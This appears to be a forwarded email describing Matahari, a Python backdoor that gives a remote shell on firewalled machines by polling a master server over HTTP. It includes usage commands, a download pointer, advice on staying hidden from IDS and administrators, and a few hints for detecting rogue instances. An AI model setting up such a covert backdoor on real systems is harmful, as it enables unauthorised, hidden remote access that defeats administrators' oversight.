Matahari matahari is a python script designed to provide a basic non-interactive shell on remote systems behind firewalls. It is intended for use by system administrators who may need some emergency backdoor to access a firewalled machine. Once you set up the script on the target machine (namely, the client) it begins trying to retrieve commands from the master machine (the server). The time between periodic requests (polls) can be configured to suit different needs ranging from low latency (frequent polls) to stealthier behaviors. All traffic between target and master machine is made through HTTP GET/POST requests and their corresponding responses, traversing firewall as standard outgoing web traffic. Optional IDS-evasion techniques can be used in special scenarios where backdoor should remain totally undetected by firewall administrators. Matahari.py's HTTP port is configurable; SNORT and many IDS do not intercept matahari packets. The script must be setup on both sides and is available on Backtrack (KDE --> Maintaining Access --> BackDoors and Rootkits) or via a quick wget (for the other side) from here: http://sourceforge.net/project/showfiles.php?group_id=206888&package_id=247564&release_id=547359 Suspect your server has been encroached? Watch for rogue python processes (renamed to something that SOUNDS perfectly believable like "updatd") and/or matahari running from anacron (which is often left enabled yet ignored) that opens scheduled tunnel access. It's also exceptional as an administrative security honeypot tool to watch an encroached server for information gathering purposes without the script kiddies catching on, should you not want to possibly expose a logserver. Usage: Suppose you have a target machine (target.foo.com) behind a firewall and you want to be able to execute commands from a master machine (master.bar.com). The scenario could be set up as follows: Exec on target machine: ./matahari.py -c master.bar.com -T polite. Be sure to keep process running even after logging off (nohup and screen are your friends) Exec anytime on master machine: ./matahari.py -s target.foo.com Reference: http://matahari.sourceforce.net http://wapedia.mobi/en/Obnosis | http://en.wiktionary.org/wiki/Citations:obnosis | Obnosis.com (503)754-4452 Laugh at this MSN Footer _________________________________________________________________ When your life is on the go—take your life with you. http://clk.atdmt.com/MRT/go/115298558/direct/01/